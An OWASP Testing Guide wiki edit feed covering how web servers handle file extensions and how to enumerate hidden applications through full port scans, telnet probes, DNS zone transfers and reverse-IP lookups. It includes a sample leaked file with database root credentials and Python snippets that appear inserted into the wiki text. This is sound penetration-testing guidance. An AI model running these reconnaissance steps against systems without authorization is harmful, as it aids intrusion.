Vulnerability scanners, such as Nessus and Nikto, check for the existence of well-known web directories. They may also allow the tester to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include wget (http://www.gnu.org/software/wget/) and curl (http://curl.haxx.se); alternatively, search for “web mirroring tools”.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12555</id>
		<title>Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12555"/>
				<updated>2006-11-14T08:56:17Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
...To review and expand...&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
File extensions are commonly used by web servers to easily determine which technologies / languages / plugins must be used to fulfill the web request.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
While this behavior is consistent with RFCs and Web Standards, using standard file extensions provides the pentester with useful information about the underlying technologies used in a web application and greatly simplifies the task of determining the attack scenarios applicable to those particular technologies.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, misconfiguration of web servers could easily reveal confidential information such as access credentials.&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access. For example, it can help understand which file extensions are returned as text/plain versus those which cause execution on the server side. The latter are indicative of technologies / languages / plugins which are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support (though the file extension alone may be deceptive and not fully conclusive; for example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related). See also next section on “web server components” for more on identifying server side technologies and components.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Submit http[s] requests involving different file extensions and verify how they are handled. These verifications should be performed on a per-directory basis. &amp;lt;br&amp;gt;&lt;br /&gt;
Verify which directories allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application. &amp;lt;br&amp;gt;&lt;br /&gt;
In case the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web / application servers; this may happen for example if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behaviour between themselves, and possibly different vulnerabilities). &amp;lt;br&amp;gt;&lt;br /&gt;
'''Example:'''&amp;lt;br&amp;gt;&lt;br /&gt;
We have identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   	mysql_connect(&amp;quot;127.0.0.1&amp;quot;, &amp;quot;root&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        or die(&amp;quot;Could not connect&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We determine the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. This example (which occurred in a real assessment) shows how dangerous access to certain kinds of files can be. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions should NEVER be returned by a web server, since they are related to files which may contain sensitive information, or to files for which there is no reason to be served. &amp;lt;br&amp;gt;&lt;br /&gt;
* .asa&lt;br /&gt;
* .inc&lt;br /&gt;
The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. &amp;lt;br&amp;gt;&lt;br /&gt;
* .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files&lt;br /&gt;
* .java: No reason to provide access to Java source files&lt;br /&gt;
* .txt: Text files&lt;br /&gt;
* .pdf: PDF documents&lt;br /&gt;
* .doc, .rtf, .xls, .ppt, ...: Office documents&lt;br /&gt;
* .bak and other extensions indicative of backup files (for example: ~ for Emacs backup files)&lt;br /&gt;
The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext.com/ for a more thorough database of extensions.&lt;br /&gt;
&lt;br /&gt;
==Gray Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Performing white box testing against file extension handling amounts to checking the configurations of the web server(s) / application server(s) taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.&lt;br /&gt;
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behaviour.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerability scanners, such as Nessus and Nikto, check for the existence of well-known web directories. They may also allow the tester to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include wget (http://www.gnu.org/software/wget/) and curl (http://curl.haxx.se); alternatively, search for “web mirroring tools”.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12426</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12426"/>
				<updated>2006-11-13T08:12:37Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control of the server and/or access to its data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without being referenced from the main website: this is true for internal and/or extranet websites, which could be misconfigured or left unpatched due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test, with no other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case such an assignment is expected to test all web applications accessible through this target (and possibly other things). The problem is that the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, miss them entirely, or notice only some of them.&lt;br /&gt;
Sometimes the target specification is richer: maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names, and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. Applications are usually published this way only when they are not meant to be reachable in a standard way and their users can be informed about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
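To make the mechanism concrete, here is a minimal sketch (in Python, not part of the original guide) of how the ''Host:'' header selects a virtual host: two requests sent to the same IP address and port differ only in this header, and the server chooses which site to serve based solely on it. The host names are the illustrative ones used above.

```python
# Sketch: the only thing distinguishing two virtual hosts on the same
# IP address and port is the Host: header in the HTTP/1.1 request.
def build_request(vhost, path="/"):
    """Build a raw HTTP/1.1 GET request for the given virtual host."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {vhost}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )

# Both requests would be sent to the same endpoint (e.g. 192.168.1.100:80);
# the server picks the content to serve based on the Host header alone.
req_a = build_request("www.example.com")
req_b = build_request("helpdesk.example.com")
```

Probing a suspected virtual host therefore amounts to repeating the same request with different Host values and comparing the responses.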
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications; being non-standard, there is no magic recipe that reveals them. However, a few criteria may aid the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to reveal this to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
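The dictionary-style guessing described above can be sketched as follows. The wordlist is hypothetical (a few commonly seen default paths, not taken from the guide); in practice you would use a larger, curated list.

```python
# Sketch: generate candidate URLs for non-published applications from a
# small wordlist of commonly used paths (hypothetical; extend as needed).
COMMON_PATHS = ["webmail", "admin", "manager/html", "phpmyadmin", "intranet"]

def candidate_urls(host, paths=COMMON_PATHS, scheme="https"):
    """Return a list of likely URLs to probe on the given host."""
    return [f"{scheme}://{host}/{p}" for p in paths]

# Each URL would then be requested (e.g. with curl or a scanner) and any
# response other than a 404 examined manually.
urls = candidate_urls("www.example.com")
```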
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -P0 -sT -sV -p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output, looking for http or an indication of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is indeed an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one shown above (note, however, that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners, but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide, compared to nmap, a number of tests for known web server vulnerabilities, as well as for the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
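The triage of nmap output described above can also be automated with a small filter. This is a sketch over the sample output shown earlier, assuming that column layout; ports whose service column mentions http, or ssl (the latter still to be confirmed as https by hand), are selected for further probing.

```python
# Sketch: pick out candidate web services from nmap-style output lines.
SAMPLE = """\
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))
443/tcp   open  ssl         OpenSSL
901/tcp   open  http        Samba SWAT administration server
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1"""

def web_candidates(nmap_output):
    """Return ports whose detected service looks like http or SSL-wrapped."""
    ports = []
    for line in nmap_output.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[1] == "open":
            service = fields[2]
            if service.startswith("http") or service == "ssl":
                ports.append(int(fields[0].split("/")[0]))
    return ports

ports = web_candidates(SAMPLE)  # [80, 443, 901, 8080]
```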
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, given that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Example: identifying www.owasp.org name servers by using host&lt;br /&gt;
&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''. If you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers&lt;br /&gt;
&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
-bash-2.05b$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query for the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
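As a sketch of what such an inverse query does under the hood: the PTR query name is built by reversing the address octets and appending ''in-addr.arpa''. Tools like ''host'' and ''dig -x'' do this for you; the construction itself is simple.

```python
# Sketch: build the PTR query name for an IPv4 address. A resolver then
# asks for a PTR record at this name; a reply (if any) yields a DNS name.
def ptr_name(ipv4):
    """Return the reverse-lookup (in-addr.arpa) name for an IPv4 address."""
    octets = ipv4.split(".")
    return ".".join(reversed(octets)) + ".in-addr.arpa"

# Example (generic address, as used elsewhere in this section):
# ptr_name("192.168.1.100") == "100.1.168.192.in-addr.arpa"
```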
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtain pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
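Since each of the services above returns partial results, combining them is a simple set union. A sketch, with hypothetical result lists standing in for the services' actual output:

```python
# Sketch: combine the (partial, overlapping) name lists returned by
# several reverse-IP services into one de-duplicated, sorted set.
def merge_results(*result_lists):
    """Union of names reported by multiple reverse-IP services."""
    names = set()
    for results in result_lists:
        # Normalize case and trailing dots so duplicates collapse.
        names.update(n.lower().rstrip(".") for n in results)
    return sorted(names)

# Hypothetical outputs from two different services:
service_a = ["www.example.com", "helpdesk.example.com"]
service_b = ["WWW.example.com", "webmail.example.com"]
merged = merge_results(service_a, service_b)  # three distinct names
```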
&lt;br /&gt;
&lt;br /&gt;
The following example shows the result of a query for 216.48.3.18, the IP address of www.owasp.org, submitted to one of the reverse-IP services listed above. Three additional non-obvious symbolic names mapping to the same address have been revealed.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs. &amp;lt;br&amp;gt;&lt;br /&gt;
For instance, considering the previous example regarding ''www.owasp.org'', you could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of ''webgoat.org'', ''webscarab.com'', ''webscarab.net''.&amp;lt;br&amp;gt;&lt;br /&gt;
Googling techniques are explained in [[Spidering and googling AoC]].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same as listed in Black Box testing, no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12425</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12425"/>
				<updated>2006-11-13T08:03:28Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
